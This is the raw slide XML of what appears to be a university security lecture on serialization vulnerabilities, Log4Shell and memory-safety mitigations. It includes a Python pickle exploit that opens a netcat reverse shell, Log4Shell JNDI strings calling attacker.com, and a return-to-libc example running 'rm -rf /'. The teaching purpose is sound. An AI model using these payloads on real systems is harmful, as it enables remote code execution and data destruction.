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4EAD4D-D319-4657-9252-201D4AB06D44}">
  <a:tblStyle styleId="{3C4EAD4D-D319-4657-9252-201D4AB06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6F63FF-C5C4-4278-AC2D-502748384C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4"/>
    <p:restoredTop sz="81014"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="307" d="100"/>
          <a:sy n="307" d="100"/>
        </p:scale>
        <p:origin x="237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fareblog.com/whats-deal-log4shell-security-nightmare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hamann.de/2020/04/05/exploiting-python-pickle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ohoff/ysoserial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347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8UGf6aWiQI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20.cs161.org/lectures/4/lec04_optional.pdf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lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf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qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit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20/2020_cwe_top25.html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77f732614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77f732614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77f732614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77f732614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Amdahl’s Law applies to your time as well!</a:t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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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https://www.lawfareblog.com/whats-deal-log4shell-security-nightmare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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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https://davidhamann.de/2020/04/05/exploiting-python-pickle/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55ff61f54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55ff61f54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https://github.com/frohoff/ysoserial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55ff61f54e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55ff61f54e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https://xkcd.com/2347/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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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7f732614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77f732614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55ff61f54e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55ff61f54e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7d8a37c2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7d8a37c2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7f732614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77f732614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7f732614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77f732614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77f732614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77f732614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memory safety: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https://www.youtube.com/watch?v=d8UGf6aWiQI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https://su20.cs161.org/lectures/4/lec04_optional.pdf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7d8a37c2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7d8a37c2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7f732614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7f732614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77f732614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77f732614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77f732614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77f732614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7f732614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77f732614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7f732614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77f732614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77f732614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77f732614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7d8a37c2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7d8a37c2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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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Remember this slide! We will use it when we talk about defending against exploits next time.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77f732614_0_1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77f732614_0_1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7d8a37c2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7d8a37c2f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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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7f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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77f732614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7f732614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7f732614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77f732614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377f732614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77f732614_0_1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77f732614_0_1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77f732614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77f732614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77f732614_0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377f732614_0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77f732614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377f732614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377f732614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377f732614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77f732614_0_1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77f732614_0_1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77f732614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77f732614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377f732614_0_1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377f732614_0_1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77f732614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77f732614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7d8a37c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7d8a37c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377f732614_0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377f732614_0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37d8a37c2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37d8a37c2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377f732614_0_1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377f732614_0_1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77f732614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77f732614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77f732614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77f732614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377f732614_0_1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377f732614_0_1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377f732614_0_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377f732614_0_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377f73261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377f73261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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0_1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77f732614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77f732614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377f7326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377f7326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377f732614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377f732614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37d8a37c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37d8a37c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377f732614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377f732614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377f732614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377f732614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77f732614_0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77f732614_0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377f732614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377f732614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77f732614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77f732614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377f732614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377f732614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377f732614_0_1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377f732614_0_1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77f732614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77f732614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37d8a37c2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37d8a37c2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377f732614_0_1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377f732614_0_1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377f732614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377f732614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377f732614_0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377f732614_0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377f732614_0_1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377f732614_0_1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377f732614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377f732614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377f732614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377f732614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77f732614_0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77f732614_0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377f732614_0_1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377f732614_0_1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37d8a37c2f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37d8a37c2f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77f732614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77f732614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377f732614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377f732614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77f732614_0_1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77f732614_0_1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https://info.lookout.com/rs/051-ESQ-475/images/pegasus-exploits-technical-details.pdf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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0_1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there needs to be liability? ~Nick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https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0_1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377f732614_0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377f732614_0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55ff61f54e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55ff61f54e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55ff61f54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55ff61f54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77f732614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77f732614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55ff61f54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55ff61f54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55ff61f54e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55ff61f54e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55ff61f5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55ff61f5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55ff61f54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155ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54e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55ff61f54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55ff61f54e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55ff61f54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55ff61f54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02F89B43-D26F-643E-8D0F-306AA9398AB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fareblog.com/whats-deal-log4shell-security-nightmare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qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit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119.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434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we.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide97.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94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we.mitre.org/data/definitions/20.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/787.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/190.html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Mitigating Memory Safety Vulnerabilities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Cited Reason: The Myth of Performance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Programmer time matters too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save more time writing code in a memory-safe language than you save in performance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“Slower” memory-safe languages often have libraries that plug into fast, secure, C libraries anyway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NumPy in Python (memory-safe)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102" name="Google Shape;1102;p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in Java and Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p1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872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safety vulnerabilities are almost exclusively in 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on memory-safe languages next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and Python have a related problem: serialization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Serialization is a huge land-mine that is easy to trigger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p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Log4Shell Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p1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  <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1117" name="Google Shape;1117;p119"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="288475" y="1431735"/>
          <a:ext cx="8567050" cy="2499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428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20002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What's the Deal with the Log4Shell Security Nightmare?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595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Nicholas Weaver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595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>December 10, 2021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We live in a strange world. What started out as a Minecraft prank, where a message in chat like </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="59595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${jndi:ldap://attacker.com/pwnyourserver}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> would take over either a Minecraft server or client, has now resulted in a 5-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages. 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18" name="Google Shape;1118;p119" title="Lawfar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25" y="1520799"/>
            <a:ext cx="18368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Serialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124" name="Google Shape;1124;p1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some complex data structure (e.g. objects pointing to objects pointing to objects)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save your program state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want to transfer this state to another running copy of your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1: Manually write and parse a custom file format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The code and the custom format are probably pretty ugly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Extra programming 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You may make errors in your parser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2: Use a serialization library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converts any object into a file (and back)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lang="en"/>
              <a:t> is a built-in Java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is a built-in Python library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p1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Vulnerabilities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(Python)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p1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Serialization libraries can load and save arbitrary objects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Arbitrary objects might contain code that can be executed (e.g. functions)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attacker provides a malicious file to be deserialized?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victim program loads a serialized file from the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deserializing the object, the code from the attacker executes!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p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(Python) exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p1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import base64, os, pickle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class RCE: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def __reduce__(self):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cmd = \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  'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f' \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  '/bin/sh -i 2&gt;&amp;1 | nc 127.0.0.1 1234 &gt; /tmp/f'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return os.system, (cmd,)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pickled = pickle.dumps(RCE())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print(base64.b64encode(pickled).decode('ascii'))</a:t>
            </a:r>
            <a:endParaRPr sz="17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Vulnerabilities in Java</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p1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Exploiting serialization is a little harder in Java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latest Java includes some protections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Deserialized code is not allowed to call certain libraries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Don't allow a deserialized object to invoke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java.lang.Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and call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/>
              <a:t> (which can execute arbitrary programs)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called a denylist or blacklist, as we’ll see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Denylists are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>brittle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forget to include a dangerous library in your list, attackers can exploit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Attackers have automated tools to exploit this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a common runtime, find snippets of code (“gadgets”) that can be executed, and chain a series of snippets together to create a larger exploit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“ysoserial”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p1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Log4j</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p1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8264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Logging: Recording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Being a good programmer, you want to record things that happen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Log4j: A very common Java framework for logging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your Java code doesn’t use Log4j, you may be importing some third-party code that uses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Unfortunately, there was a bug added…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p1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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1154" name="Google Shape;1154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62" y="1194175"/>
            <a:ext cx="3006188" cy="38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Log4j and JNDI (Java Naming &amp; Directory Interface)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p1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JNDI (Java Naming &amp; Directory Interface): A service to fetch data from outside places (e.g. the Internet)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Log4j has a pretty powerful format string parser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logged string is fully created, Log4j parses the format strings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Log4j saw the string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${jndi:ldap://attacker.com/pwnage}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Log4j thinks: “This is a JNDI object I need to include’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thinks: “Okay, let’s get that object from attacker.com”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thinks: “Okay, let’s deserialize that Java object”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Because a logged string included a reference that Java fetches from the network and deserializes, the attacker can use it to exploit programs!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Serialization: Detection and Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Google Shape;1167;p1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lang="en"/>
              <a:t> in Java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in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an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>ever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> provide input to these functions?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the code runs on your server and you accept data from users, you should assume that the users might be malicious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 the code to use safe alternatives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 (Java Script Object Notation)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 buffers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p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Reason: Legacy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common actual reason: inertia and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>legacy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Huge existing code bases are written in C, and building on existing code is easier than starting from scratch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old code is written in {language}, new code will be written in {language}!</a:t>
            </a:r>
            <a:endParaRPr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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p1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Buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker overwrites unintended parts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Stack smashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker overwrites saved registers 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Memory-safe code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Fixing code to avoid buffer overflows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Integer memory safety vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits how integers are represented in C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Format string vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the arguments to printf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Heap vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker exploits the heap layout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Serialization vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker provides a malicious object to be deserialized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Writing robust exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Making exploits work in different environments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Tomorrow: Defending against memory safety vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p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Learn to write memory-safe code.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Defensive programming: Always add checks in your code just in case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Always check a pointer is not null before dereferencing it, even if you’re sure the pointer is going to be valid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Relies on programmer discipline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 safe libraries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 functions that check bounds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Use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 dirty="0"/>
              <a:t> instead of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Use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" dirty="0"/>
              <a:t> or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strlcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> instead of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Use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snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> instead of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sprintf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Relies on programmer discipline or tools that check your program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Structure user input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Constrain how untrusted sources can interact with the system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When asking a user to input their age, only allow digits (0–9) as inputs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Reason carefully about your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writing code, define a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>preconditions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>postconditions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>invariants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> that must be satisfied for the code to be memory-safe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Rarely used in practice</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;17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Secure Software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Learn to write memory-safe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Use tools for analyzing and patching insecure code.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Building Secure Software/Systems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Run-time checks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bounds-checking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involve performance overhead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Crash if the check fails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 code for run-time misbehavior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Look for illegal calling sequences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Your code never calls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"/>
              <a:t>, but you notice that your code is executing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Probably too late by the time you detect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 potential damage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Run system components in sandboxes or virtual machines (VMs)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about privilege separation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Bug-finding tools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Excellent resource, as long as there aren’t too many false bugs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Hiring someone to look over your code for memory safety errors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very effective… but also expensive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Vulnerability scanning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Probe your systems for known flaws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Penetration testing (“pen-testing”)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someone to break into your system</a:t>
            </a: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Building Secure Software/Systems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Memory Safety Mitigations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Memory-safe languages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memory-safe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secure software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 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space layout randomization (ASLR)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mitigations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Software Security Issues</a:t>
            </a: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test programs for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Fuzz testing: Random inputs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like Valgrind (tool for detecting memory leaks)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corner cases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tell if we’ve found a problem?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a crash or other unexpected behavior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know that we’ve tested enough?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know, but code-coverage tools can help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Towards Secure Systems</a:t>
            </a:r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software often imports lots of different libraries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 are often updated with security patches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enough to keep your own code secure: You also need to keep libraries updated with the latest security patches!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hard about patching?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require restarting production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break crucial functionality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Mitigations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Learn to write memory-safe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tools for analyzing and patching insecure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Add mitigations that make it harder to exploit common vulnerabilities.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Mitigations</a:t>
            </a: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Someone has just handed you a large, existing codebase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written in a memory-safe language, and it wasn’t written with memory safety in mind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you protect this code from exploits without having to completely rewrite it?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Exploit mitigations (code hardening)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Compiler and runtime defenses that make common exploits harder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ways to turn attempted exploits into program crashes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Crashing is safer than exploitation: The attacker can crash our system, but at least they can’t execute arbitrary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Mitigations are cheap (low overhead) but not free (some costs associated with them)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 memory safety (e.g. buffer overflow) vulnerability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from the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55" name="Google Shape;25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Non-Executable Pages</a:t>
            </a:r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Overwrite the RIP with the address of the shellcode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Non-executable pages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Non-Executable Pages</a:t>
            </a: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Most programs don’t need memory that is both written to and executed, so make portions of memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> writable but not both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Stack, heap, and static data: Writable but not executable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Code: Executable but not writable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Page table entries have a writable bit and an executable bit that can be set to achieve this behavior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Recall page tables: Converts virtual addresses to physical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Implemented in hardware, so effectively 0 overhead!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Also known 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W^X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (write XOR execute)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DEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (Data Execution Prevention, name used by Windows)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No-execute bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (the name of the bit itself)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;27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We’ve seen how widespread and dangerous memory safety vulnerabilities can be. Why do these vulnerabilities exist?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Programming languages aren’t designed well for security.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Programmers often aren’t security-aware.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Programmers write code without designing security in from the start.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Programmers are humans. Humans make mistakes.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</a:t>
            </a:r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Issue: Non-executable pages doesn’t prevent an attacker from leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> code in memory as part of the exploit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programs have many functions loaded into memory that can be used for malicious behavior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Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: An exploit technique that overwrites the RIP to jump to a functions in the standard C library (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>) or a common operating system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Return-oriented programming (ROP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Constructing custom shellcode using pieces of code that already exist in memory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;28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Per the x86 calling convention, each program expects arguments to be placed directly above the RIP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/>
              <a:t> function, which executes a shell command. We want to execute it like this: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92" name="Google Shape;292;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139350" y="3427325"/>
            <a:ext cx="2865300" cy="615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char cmd[] = "rm -rf /";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system(cmd);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298" name="Google Shape;298;p48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299" name="Google Shape;299;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="298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Google Shape;300;p4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01" name="Google Shape;301;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="300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02" name="Google Shape;302;p4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03" name="Google Shape;303;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1207250"/>
            <a:ext cx="2584800" cy="1169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system]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'B' * 4</a:t>
            </a:r>
            <a:endParaRPr sz="10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"rm -rf /"]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"rm -rf /"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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139125" y="2002750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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="2836575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06" name="Google Shape;306;p48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="305" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="2944275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48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14" name="Google Shape;314;p49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15" name="Google Shape;315;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="31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16" name="Google Shape;316;p4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7" name="Google Shape;317;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1207250"/>
            <a:ext cx="2584800" cy="1169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system]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'B' * 4</a:t>
            </a:r>
            <a:endParaRPr sz="10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"rm -rf /"]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"rm -rf /"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2761159" y="29824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20" name="Google Shape;320;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="319" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="30901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9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5" name="Google Shape;325;p49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26" name="Google Shape;326;p49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32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49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29" name="Google Shape;329;p49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5305375" y="442163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36" name="Google Shape;336;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="335" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786275" y="459098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37" name="Google Shape;337;p5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38" name="Google Shape;338;p50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2761159" y="3141375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40" name="Google Shape;340;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="339" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3249075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0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43" name="Google Shape;3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0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5" name="Google Shape;345;p50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46" name="Google Shape;346;p50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="34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50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49" name="Google Shape;349;p50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56" name="Google Shape;356;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4324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57" name="Google Shape;357;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4805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58" name="Google Shape;358;p5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59" name="Google Shape;359;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="3300269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60" name="Google Shape;360;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="359" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="3407969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1" name="Google Shape;3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1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5" name="Google Shape;365;p51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66" name="Google Shape;366;p51"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="36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51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69" name="Google Shape;369;p51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76" name="Google Shape;376;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305500" y="3022587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77" name="Google Shape;377;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="376" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="3191937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78" name="Google Shape;378;p5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79" name="Google Shape;379;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="34396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80" name="Google Shape;380;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="379" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="35473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81" name="Google Shape;3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2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5" name="Google Shape;385;p52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86" name="Google Shape;386;p52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="385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52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89" name="Google Shape;389;p52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96" name="Google Shape;396;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5305500" y="272628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97" name="Google Shape;397;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="396" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786400" y="2895631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98" name="Google Shape;398;p5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99" name="Google Shape;399;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761159" y="22204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00" name="Google Shape;400;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="399" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3076159" y="23281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1" name="Google Shape;4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03" name="Google Shape;4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3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5" name="Google Shape;405;p53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406" name="Google Shape;406;p53"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="405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07" name="Google Shape;407;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295625" y="1137753"/>
            <a:ext cx="4926000" cy="1472850"/>
            <a:chOff x="1295625" y="1137753"/>
            <a:chExt cx="4926000" cy="1472850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
